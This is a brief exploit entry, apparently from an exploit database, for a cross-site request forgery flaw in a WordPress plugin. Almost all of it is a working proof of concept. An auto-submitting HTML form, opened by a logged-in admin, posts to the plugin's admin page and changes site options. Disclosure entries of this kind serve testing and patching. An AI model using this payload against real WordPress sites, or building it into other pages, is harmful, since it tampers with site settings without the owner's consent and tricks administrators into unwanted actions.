Share
## https://sploitus.com/exploit?id=WPEX-ID:D16F6BA0-A47D-413F-A6D4-058910441009
Make an admin open the following HTML:

<body onload="document.forms[0].submit()">
    <form action="http://localhost:8888/wordpress/wp-admin/options-general.php?page=link-party/includes/admin.php" method="POST"> 
        <input type="text" name="action" value="update">        
        <input type="text" name="users_can_register" value="0">
        <input type="submit" value="csrf">
    </form>
</body>

See that the support the plugin option is toggled on/off.